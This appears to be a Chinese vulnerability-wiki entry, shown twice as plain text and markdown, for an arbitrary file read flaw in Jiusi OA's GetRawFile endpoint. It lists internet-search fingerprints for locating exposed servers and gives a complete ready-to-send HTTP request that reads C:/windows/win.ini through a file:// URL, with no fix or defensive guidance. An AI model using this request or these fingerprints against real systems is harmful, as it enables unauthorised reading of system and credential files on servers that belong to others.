fofamini-wiki

登录白背景

源码

九思OA GetRawFile存在任意文件读取漏洞

一、漏洞简介

九思OA系统是安装、实施、学习、操作、维护的OA系统，由北京九思协同软件有限公司开发。九思OA GetRawFile存在任意文件读取漏洞

二、影响版本

九思OA

三、资产测绘

hunterweb.body="/jsoa/webmail/ajax_util.js"、app.name=="九思 OA"
特征

四、漏洞复现

GET /jsoa/GetRawFile?url=file:///C:/windows/win.ini HTTP/1.1
Host: 
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=3398F004AB22ECAB15565E659343C927; jsoaUserName=; MarkPwd=0
Connection: close

原文: https://www.yuque.com/xiaokp7/ocvun2/xs7vhus88lbw7q7s

# 九思OA GetRawFile存在任意文件读取漏洞

# 一、漏洞简介
九思OA系统是安装、实施、学习、操作、维护的OA系统，由北京九思协同软件有限公司开发。九思OA GetRawFile存在任意文件读取漏洞

# 二、影响版本
+ 九思OA

# 三、资产测绘
+ hunter`web.body="/jsoa/webmail/ajax_util.js"`、`app.name=="九思 OA"`
+ 特征

![1701753331634-af657e2a-d0d2-47d9-8907-60d794e2eb29.png](./img/m0g7A1TCF1Evrlj0/1701753331634-af657e2a-d0d2-47d9-8907-60d794e2eb29-185550.png)

# 四、漏洞复现
```java
GET /jsoa/GetRawFile?url=file:///C:/windows/win.ini HTTP/1.1
Host: 
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=3398F004AB22ECAB15565E659343C927; jsoaUserName=; MarkPwd=0
Connection: close
```

![1722953792599-6b92cf0a-7fd0-49c4-9471-3bfeacada121.png](./img/m0g7A1TCF1Evrlj0/1722953792599-6b92cf0a-7fd0-49c4-9471-3bfeacada121-721037.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/xs7vhus88lbw7q7s>